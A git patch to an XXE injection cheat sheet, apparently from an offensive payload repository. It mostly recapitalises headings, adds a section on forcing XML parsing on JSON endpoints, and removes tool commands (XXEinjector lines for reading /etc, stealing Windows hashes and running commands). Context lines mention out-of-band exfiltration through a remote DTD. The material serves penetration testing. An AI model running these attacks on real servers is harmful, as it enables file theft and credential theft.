From 846706b87dac4cbd74990d802f103f8fbb1c47ab Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 18 Nov 2024 10:43:39 +0100 Subject: [PATCH] XXE on JSON Endpoints --- XXE Injection/README.md | 172 +++++++++++++++++++--------------------- 1 file changed, 82 insertions(+), 90 deletions(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index c0d3ffe..05908f4 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -6,34 +6,36 @@ ## Summary - [Tools](#tools) -- [Detect the vulnerability](#detect-the-vulnerability) -- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files) +- [Detect The Vulnerability](#detect-the-vulnerability) +- [Exploiting XXE to Retrieve Files](#exploiting-xxe-to-retrieve-files) - [Classic XXE](#classic-xxe) - - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded) - - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) - - [XInclude attacks](#xinclude-attacks) -- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) -- [Exploiting XXE to perform a denial of service](#exploiting-xxe-to-perform-a-denial-of-service) + - [Classic XXE Base64 Encoded](#classic-xxe-base64-encoded) + - [PHP Wrapper Inside XXE](#php-wrapper-inside-xxe) + - [XInclude Attacks](#xinclude-attacks) +- [Exploiting XXE to Perform SSRF Attacks](#exploiting-xxe-to-perform-SSRF-attacks) +- [Exploiting XXE to Perform a Denial of Service](#exploiting-xxe-to-perform-a-denial-of-service) - [Billion Laugh Attack](#billion-laugh-attack) - - [YAML attack](#yaml-attack) - - [Parameters Laugh attack](#parameters-laugh-attack) + - [YAML Attack](#yaml-attack) + - [Parameters Laugh Attack](#parameters-laugh-attack) - [Exploiting Error Based XXE](#exploiting-error-based-xxe) - [Error Based - Using Local DTD File](#error-based---using-local-dtd-file) - [Error Based - Using Remote DTD](#error-based---using-remote-dtd) -- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) +- [Exploiting Blind XXE to Exfiltrate Data Out Of Band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) + - [XXE OOB with DTD and PHP Filter](#xxe-oob-with-dtd-and-php-filter) - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf) +- [XXE with Local DTD](#xxe-with-local-dtd) - [WAF Bypasses](#waf-bypasses) - - [Bypass via character encoding](#bypass-via-character-encoding) + - [Bypass via Character Encoding](#bypass-via-character-encoding) + - [XXE on JSON Endpoints](#xxe-on-json-endpoints) - [XXE in Java](#xxe-in-java) -- [XXE in exotic files](#xxe-in-exotic-files) - - [XXE inside SVG](#xxe-inside-svg) - - [XXE inside SOAP](#xxe-inside-soap) - - [XXE inside DOCX file](#xxe-inside-docx-file) - - [XXE inside XLSX file](#xxe-inside-xlsx-file) - - [XXE inside DTD file](#xxe-inside-dtd-file) +- [XXE in Exotic Files](#xxe-in-exotic-files) + - [XXE Inside SVG](#xxe-inside-svg) + - [XXE Inside SOAP](#xxe-inside-soap) + - [XXE Inside DOCX file](#xxe-inside-docx-file) + - [XXE Inside XLSX file](#xxe-inside-xlsx-file) + - [XXE Inside DTD file](#xxe-inside-dtd-file) - [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents) - [Labs](#labs) - [References](#references) @@ -41,58 +43,14 @@ ## Tools -- [xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads - ```ps1 - sudo ./xxeftp -uno 443 - ./xxeftp -w -wps 5555 - ``` -- [230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) - ```ps1 - $ python3 230.py 2121 - ``` -- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods - ```ps1 - # Enumerating /etc directory in HTTPS application: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl - # Enumerating /etc directory using gopher for OOB method: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher - # Second order exploitation: - ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt - # Bruteforcing files using HTTP out of band method and netdoc protocol: - ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc - # Enumerating using direct exploitation: - ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK - # Enumerating unfiltered ports: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all - # Stealing Windows hashes: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes - # Uploading files using Java jar: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf - # Executing system commands using PHP expect: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls - # Testing for XSLT injection: - ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt - # Log requests only: - ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt - ``` -- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) - ```ps1 - ruby server.rb - ``` -- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc - ```ps1 - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx - ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place - ./docem.py -s samples/xss_sample_0.odt -pm xss -pf payloads/xss_tiny.txt -pm per_place - ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_file -kt -sx docx - ``` -- [otori](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities. - ```ps1 - python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs - ``` +- [staaldraad/xxeftp](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads +- [lc/230-OOB](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via [http://xxe.sh/](http://xxe.sh/) +- [enjoiz/XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods +- [BuffaloWill/oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF) +- [whitel1st/docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc -## Detect the vulnerability +## Detect The Vulnerability **Internal Entity**: If an entity is declared within a DTD it is called an internal entity. Syntax: `` @@ -113,7 +71,7 @@ Basic entity test, when the XML parser parses the external entities the result s It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. -## Exploiting XXE to retrieve files +## Exploiting XXE to Retrieve Files ### Classic XXE @@ -153,13 +111,13 @@ We try to display the content of the file `/etc/passwd`. ``` -### Classic XXE Base64 encoded +### Classic XXE Base64 Encoded ```xml %init; ]> ``` -### PHP Wrapper inside XXE +### PHP Wrapper Inside XXE ```xml ]> @@ -183,7 +141,7 @@ We try to display the content of the file `/etc/passwd`. &xxe; ``` -### XInclude attacks +### XInclude Attacks When you can't modify the **DOCTYPE** element use the **XInclude** to target @@ -194,7 +152,7 @@ When you can't modify the **DOCTYPE** element use the **XInclude** to target -## Exploiting XXE to perform SSRF attacks +## Exploiting XXE to Perform SSRF Attacks XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network. @@ -208,7 +166,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo ``` -## Exploiting XXE to perform a denial of service +## Exploiting XXE to Perform a Denial of Service :warning: : These attacks might kill the service or the server, do not use them on the production. @@ -225,7 +183,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo &a4; ``` -### YAML attack +### YAML Attack ```xml a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] @@ -239,7 +197,7 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` -### Parameters Laugh attack +### Parameters Laugh Attack A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping. @@ -334,7 +292,7 @@ Let's break down the payload: -## Exploiting blind XXE to exfiltrate data out-of-band +## Exploiting Blind XXE to Exfiltrate Data Out of Band Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. @@ -376,7 +334,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd %all; ``` -### XXE OOB with DTD and PHP filter +### XXE OOB with DTD and PHP Filter ```xml @@ -415,7 +373,7 @@ Send the XML file to the `deploy` folder. Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) -## XXE with local DTD +## XXE with Local DTD In some case, outgoing connections are not possible from the web application. DNS names might even not resolve externally with a payload like this: ```xml @@ -451,26 +409,33 @@ Assuming payloads such as the previous return a verbose error. You can start poi ]> ``` + ### Cisco WebEx -``` + +```xml Your DTD code %local_dtd; ``` + ### Citrix XenMobile Server -``` + +```xml Your DTD code %local_dtd; ``` -[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) + +* [GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) - List DTDs and generate XXE payloads using those local DTDs. + ## WAF Bypasses -### Bypass via character encoding +### Bypass via Character Encoding XML parsers uses 4 methods to detect encoding: + * HTTP Content Type: `Content-Type: text/xml; charset=utf-8` * Reading Byte Order Mark (BOM) * Reading first symbols of document @@ -491,6 +456,31 @@ XML parsers uses 4 methods to detect encoding: cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ``` + +### XXE on JSON Endpoints + +In the HTTP request try to switch the `Content-Type` from **JSON** to **XML**, + +| Content Type | Data | +| ------------------ | ---------------------------------- | +| `application/json` | `{"search":"name","value":"test"}` | +| `application/xml` | `namedata` | + + +* XML documents must contain one root (``) element that is the parent of all other elements. +* The data must be converted to XML too, otherwise the server will respond with an error. + +```json +{ + "errors":{ + "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity." + } +} +``` + +* [NetSPI/Content-Type Converter](https://github.com/NetSPI/Burp-Extensions/releases/tag/1.4) + + ## XXE in Java Insecure configuration in 10 different Java classes from three XML processing interfaces (DOM, SAX, StAX) that can lead to XXE: @@ -512,9 +502,10 @@ Ref. - [Semgrep - XML Security in Java](https://semgrep.dev/blog/2022/xml-security-in-java) - [Semgrep - XML External entity prevention for Java](https://semgrep.dev/docs/cheat-sheets/java-xxe/) -## XXE in exotic files -### XXE inside SVG +## XXE in Exotic Files + +### XXE Inside SVG ```xml @@ -565,7 +556,7 @@ _xxe.svg_ "> ``` -### XXE inside SOAP +### XXE Inside SOAP ```xml @@ -575,7 +566,7 @@ _xxe.svg_ ``` -### XXE inside DOCX file +### XXE Inside DOCX file Format of an Open XML file (inject the payload in any .xml file): @@ -600,11 +591,11 @@ JPG (experimental) GIF (experimental) ``` -### XXE inside XLSX file +### XXE Inside XLSX file Structure of the XLSX: -``` +```ps1 $ 7z l xxe.xlsx [...] Date Time Attr Size Compressed Name @@ -667,7 +658,7 @@ Serve DTD and receive FTP payload using [xxeserv](https://github.com/staaldraad/ $ xxeserv -o files.log -p 2121 -w -wd public -wp 8000 ``` -### XXE inside DTD file +### XXE Inside DTD file Most XXE payloads detailed above require control over both the DTD or `DOCTYPE` block as well as the `xml` file. In rare situations, you may only control the DTD file and won't be able to modify the `xml` file. For example, a MITM. @@ -752,6 +743,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 - [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) - [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) - [Pentest XXE - @phonexicum - March 9, 2020](https://phonexicum.github.io/infosec/xxe.html) +- [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/) - [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe) - [XML attacks - Mariusz Banach (@mgeeky) - December 21, 2017](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) - [XML external entity (XXE) injection - PortSwigger - May 29, 2019](https://portswigger.net/web-security/xxe)